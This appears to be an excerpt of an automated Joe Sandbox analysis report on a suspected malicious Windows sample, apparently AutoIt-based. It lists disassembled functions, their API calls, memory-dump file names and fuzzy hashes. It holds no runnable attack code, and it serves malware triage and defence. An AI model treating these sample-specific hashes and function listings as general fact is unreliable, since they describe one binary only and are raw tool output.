                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                      • String ID:
                                      • API String ID: 3094916012-0
                                      • Opcode ID: 5e4ae7d4d95d3f0b21368930a6211b338bbd8f27b72dc0d0e1bb798baf5603f4
                                      • Instruction ID: 642e690e563de54df476ee924941194e091bdb2244f2cfd8e9fe0c508a431f78
                                      • Opcode Fuzzy Hash: 5e4ae7d4d95d3f0b21368930a6211b338bbd8f27b72dc0d0e1bb798baf5603f4
                                      • Instruction Fuzzy Hash: A571BCB49293008FC798EF7FA9457953AE4FB88346754862AE51AC7371FB304846EF41
                                      Function 008B86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,008B85CC,?,00948CC8,0000000C), ref: 008B8704
                                      • GetLastError.KERNEL32(?,008B85CC,?,00948CC8,0000000C), ref: 008B870E
                                      • __dosmaperr.LIBCMT ref: 008B8739
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseErrorHandleLast__dosmaperr
                                      • String ID:
                                      • API String ID: 2583163307-0
                                      • Opcode ID: 28732caee981ebeb5f82ee2e128be70c6fb5a9fbf2a919c22b21cda821d7567b
                                      • Instruction ID: 9e5f18822a16487e500430168606a4d7d75d0871dd8f01446107c857cd40b58c
                                      • Opcode Fuzzy Hash: 28732caee981ebeb5f82ee2e128be70c6fb5a9fbf2a919c22b21cda821d7567b
                                      • Instruction Fuzzy Hash: C2016B32608320A6D6647238A8497FF2B8DEBA7778F380119F814CB3D2DEA08C85C251
                                      Function 00891310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 008917F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: CALL
                                      • API String ID: 1385522511-4196123274
                                      • Opcode ID: b37f7655e518c1be607a2ba6685ef6417d6ffdedaed3a0cc10520aaedc743dc5
                                      • Instruction ID: 40e4c69cba103cda3eb385e9cb3f19c4fa41de59f501a4ce849a64aa3ae558a4
                                      • Opcode Fuzzy Hash: b37f7655e518c1be607a2ba6685ef6417d6ffdedaed3a0cc10520aaedc743dc5
                                      • Instruction Fuzzy Hash: EB226B706082069FCB14EF18C484A2ABBF1FF89314F19896DF596CB362D771E855CB92
                                      Function 00883837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00883908
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_
                                      • String ID:
                                      • API String ID: 1144537725-0
                                      • Opcode ID: 90fc3ce290c9181520ecabc3d572fab5f2fc389ae8160b6a80a1a2ffcfc4081f
                                      • Instruction ID: 6e8029acc99a5bbb99572c46208b2e1ba60b519bed98c81775a341dc8674d44c
                                      • Opcode Fuzzy Hash: 90fc3ce290c9181520ecabc3d572fab5f2fc389ae8160b6a80a1a2ffcfc4081f
                                      • Instruction Fuzzy Hash: C03191B06083019FD720EF25D894797BBE8FB49709F00092EF99AD3250E771AA44DB52
                                      Function 00885745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0088949C,?,00008000), ref: 00885773
                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0088949C,?,00008000), ref: 008C4052
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: ec3261a21ee289e81ce7cfa2d6efcd386468db97cb5f7d10a27cce7d3b042967
                                      • Instruction ID: 1bdf03ecd63117189d0188213dc47fee14b5b8e174fbb01890a2f467752b3ff7
                                      • Opcode Fuzzy Hash: ec3261a21ee289e81ce7cfa2d6efcd386468db97cb5f7d10a27cce7d3b042967
                                      • Instruction Fuzzy Hash: F0015631285625B6E7706A2ADC0EFA77F94EF02B74F14C314BA5C9A1E0C7B45854DB90
                                      Function 0088B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0088BB4E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID:
                                      • API String ID: 1385522511-0
                                      • Opcode ID: 4fd6277dad6d989979290fff0022474c865bdcac6c9be14031f22b349145f34d
                                      • Instruction ID: 695bcf2a8a91683625b1a712cba9aae81ddd07dbc0605c5991a04e780a98281e
                                      • Opcode Fuzzy Hash: 4fd6277dad6d989979290fff0022474c865bdcac6c9be14031f22b349145f34d
                                      • Instruction Fuzzy Hash: 3C32AA30A042099FDB24EF58C894BBEB7B9FF85354F18806AE905EB361D774AD41CB91
                                      Function 0090709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID:
                                      • API String ID: 2948472770-0
                                      • Opcode ID: a9cdd8489c80f2d6690be6a42c69c02090c667632164baa1224664e2910c2f93
                                      • Instruction ID: b35b16167ce8a48e5c820329b836a8c4d8d8334a2f60e4f7ac68fb33df12ab33
                                      • Opcode Fuzzy Hash: a9cdd8489c80f2d6690be6a42c69c02090c667632164baa1224664e2910c2f93
                                      • Instruction Fuzzy Hash: F4D15A75E0420AEFDB14EFD8D8819ADFBB5FF48320F14415AE915AB291DB30AD81CB91
                                      Function 01393268 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 01392AD8: GetFileAttributesW.KERNELBASE(?), ref: 01392AE3
                                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 013933C4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AttributesCreateDirectoryFile
                                      • String ID:
                                      • API String ID: 3401506121-0
                                      • Opcode ID: 3d36b3da96bb434a09e632d702a32f58a5c23738ca89f7d7b688686f2a213ea2
                                      • Instruction ID: 91147891a2a9620234689d2d4b14ebb82069a7e2b1809fb04aeabe41b4d4f6ba
                                      • Opcode Fuzzy Hash: 3d36b3da96bb434a09e632d702a32f58a5c23738ca89f7d7b688686f2a213ea2
                                      • Instruction Fuzzy Hash: BD516E71A10209A6EF14DFB4D844BEF733AFF58700F00456DE60DE7290EA799A85CBA5
                                      Function 0089FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: 8561221120838ec1b89dd5d3674560e1fb6c852bbe6975aa677f7ceb364705ba
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: 2E31D375A00109DBDB1CEF59D480969FBA5FF89308B28C6A5E909CB656D731EEC1CBC0
                                      Function 00884ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00884E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E9C
                                        • Part of subcall function 00884E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884EAE
                                        • Part of subcall function 00884E90: FreeLibrary.KERNEL32(00000000,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884EC0
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884EFD
                                        • Part of subcall function 00884E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008C3CDE,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E62
                                        • Part of subcall function 00884E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884E74
                                        • Part of subcall function 00884E59: FreeLibrary.KERNEL32(00000000,?,?,008C3CDE,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E87
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressFreeProc
                                      • String ID:
                                      • API String ID: 2632591731-0
                                      • Opcode ID: 5cb913f15105cf838e85e36c05f0f67c1912bdce08b9ed613e160e5e2ad80528
                                      • Instruction ID: 7d931574b49efa688b0c474d7c3c7d96dde3cd5612353a45d6f9e734065bde4b
                                      • Opcode Fuzzy Hash: 5cb913f15105cf838e85e36c05f0f67c1912bdce08b9ed613e160e5e2ad80528
                                      • Instruction Fuzzy Hash: 1311E332650206AADB24BF68DC02FAD77A5FF40714F10842EF642E61C1EE70DE459751
                                      Function 008B8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: __wsopen_s
                                      • String ID:
                                      • API String ID: 3347428461-0
                                      • Opcode ID: 27d9446163fbb182e01691068916ed9c9b46b39f111d48d9440925fdeb9291e5
                                      • Instruction ID: 2238151445153cbfa06d58f5a572b2c0aca4301b5d5688a2dd261a682de0625f
                                      • Opcode Fuzzy Hash: 27d9446163fbb182e01691068916ed9c9b46b39f111d48d9440925fdeb9291e5
                                      • Instruction Fuzzy Hash: 0A11F57590420AEFCB05DF58E941ADA7BF9FF48314F104059F808EB312DA31DA15CBA5
                                      Function 008B5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008B4C7D: RtlAllocateHeap.NTDLL(00000008,00881129,00000000), ref: 008B4CBE
                                      • _free.LIBCMT ref: 008B506C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                      • Instruction ID: e7f9b20b27bf42c2c0c98e1274ea5d9f00fd8958927035f262fb3a168e5dbad5
                                      • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                      • Instruction Fuzzy Hash: 27012672204B056BE321DE699881A9AFBE8FB89370F25051DE184C3380EA30A806C6B4
                                      Function 008AE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                      • Instruction ID: 5b4df9388b642191c08c648c224625f9d3e0975d4d2ccc078e62504fce6380ff
                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                      • Instruction Fuzzy Hash: 3EF0D132510A14A6E6313E6D8C09B9A379CFF63334F140F15F426D2AD2DA749806C6AA
                                      Function 008B4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00881129,00000000), ref: 008B4CBE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 7cef05842524357178144f94371692aa93a9919fa0b1067d272c6d6de5384564
                                      • Instruction ID: e876cd3c1dafc6a09fd86eb1e6f63af9f65b61b6bdb1bccb60834c818c6358f0
                                      • Opcode Fuzzy Hash: 7cef05842524357178144f94371692aa93a9919fa0b1067d272c6d6de5384564
                                      • Instruction Fuzzy Hash: E9F0243120622867EB211F669C16BDA3F88FF81BA1B146121F819E6383CAB0DC0082E0
                                      Function 008B3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: c7ef6231cf9e61a5f14dc73eaf2a214d78e0cde3529c3b23033ed82a9a41366b
                                      • Instruction ID: dbf0cb134de73e8141d98b2a1db4e33c61fd8124e82548575c89159cae94d7c1
                                      • Opcode Fuzzy Hash: c7ef6231cf9e61a5f14dc73eaf2a214d78e0cde3529c3b23033ed82a9a41366b
                                      • Instruction Fuzzy Hash: B2E0E53114422567EB2126AB9C00BDA3648FB827B0F060030BC14D2B91DBA0EE0182E3
                                      Function 00884F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884F6D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 3fd7a016c2d1eb3d460131ea484698cc80ce3f3976bdeddf3644ee5c5600bfce
                                      • Instruction ID: 1669959087c2c0666fb828d81290c945103dfe4758996db80f1a9e8eca317bac
                                      • Opcode Fuzzy Hash: 3fd7a016c2d1eb3d460131ea484698cc80ce3f3976bdeddf3644ee5c5600bfce
                                      • Instruction Fuzzy Hash: 29F03072145752CFDB34AF64D490812B7E4FF143193159D7EE2DAC2511CB319844DF10
                                      Function 008ECCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,008CEE51,00943630,00000002), ref: 008ECD26
                                        • Part of subcall function 008ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,008ECD19,?,?,?), ref: 008ECC59
